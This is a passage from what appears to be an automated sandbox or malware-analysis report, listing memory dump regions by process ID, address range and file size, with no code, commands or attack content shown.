                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/3900-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/3900-387-0x00000000048D0000-0x00000000051F6000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                          • memory/3900-404-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            35.9MB

                                                                                                                                                                                                          • memory/3976-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4008-325-0x0000000005500000-0x0000000005501000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4008-305-0x0000000077C00000-0x0000000077D8E000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                          • memory/4008-275-0x0000000000150000-0x0000000000151000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4008-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4040-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4260-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4264-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4312-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4316-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4340-235-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            240KB

                                                                                                                                                                                                          • memory/4340-378-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-315-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-279-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-340-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-308-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-332-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-335-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-338-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-364-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-343-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-347-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-374-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-376-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-271-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-358-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-360-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-312-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-355-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4340-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4340-250-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/4472-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4552-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4584-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4628-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4640-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4640-258-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            12KB

                                                                                                                                                                                                          • memory/4656-391-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                          • memory/4684-386-0x00000280FE400000-0x00000280FE4CF000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            828KB

                                                                                                                                                                                                          • memory/4684-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/4684-385-0x00000280FE390000-0x00000280FE3FF000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            444KB

                                                                                                                                                                                                          • memory/4764-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5024-352-0x0000000005360000-0x000000000585E000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                          • memory/5024-319-0x000000000041A772-mapping.dmp
                                                                                                                                                                                                          • memory/5048-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5060-321-0x00000000004057F0-mapping.dmp
                                                                                                                                                                                                          • memory/5060-329-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            108KB

                                                                                                                                                                                                          • memory/5072-416-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5084-326-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                          • memory/5084-349-0x0000000005750000-0x0000000005D56000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                          • memory/5148-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5240-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5388-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5400-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5436-436-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5644-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/5976-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/6032-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/6052-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/6080-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/6112-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                          • memory/6132-464-0x0000000000000000-mapping.dmp